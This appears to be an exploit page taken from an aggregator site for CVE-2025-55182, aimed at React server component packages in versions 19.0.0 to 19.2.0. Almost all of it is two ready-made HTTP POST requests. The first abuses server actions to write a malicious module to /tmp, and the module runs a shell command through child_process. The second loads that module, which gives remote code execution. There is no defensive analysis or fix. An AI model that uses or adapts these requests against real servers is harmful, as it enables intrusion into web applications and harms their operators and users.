Share
## https://sploitus.com/exploit?id=5E9A6165-7807-5F02-A0F5-0DD3D2A951B3
# CVE-2025-55182
Raw HTTP Requests to exploit the insecure lazy module load in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0.
Prerequisite: **fs** and **module** packages are loaded
### Request 1/2 (write malicious module to disk via writeFileSync)
```
POST /form HTTP/1.1
Content-Type: multipart/form-data; boundary=----FormBoundary
Content-Length: 354
Host:
Connection: keep-alive
------FormBoundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------FormBoundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"fs#writeFileSync","bound":["/tmp/evil-module.js","const result = require('child_process').execSync('whoami').toString().trim();module.exports = 'result: ' + result;"]}
------FormBoundary--
```
### Request 2/2 (load and execute the JS code defined in module previously written to disk)
```
POST /form HTTP/1.1
Content-Type: multipart/form-data; boundary=----FormBoundary
Content-Length: 229
Host:
Connection: keep-alive
------FormBoundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------FormBoundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"module#_load","bound":["/tmp/evil-module.js"]}
------FormBoundary--
```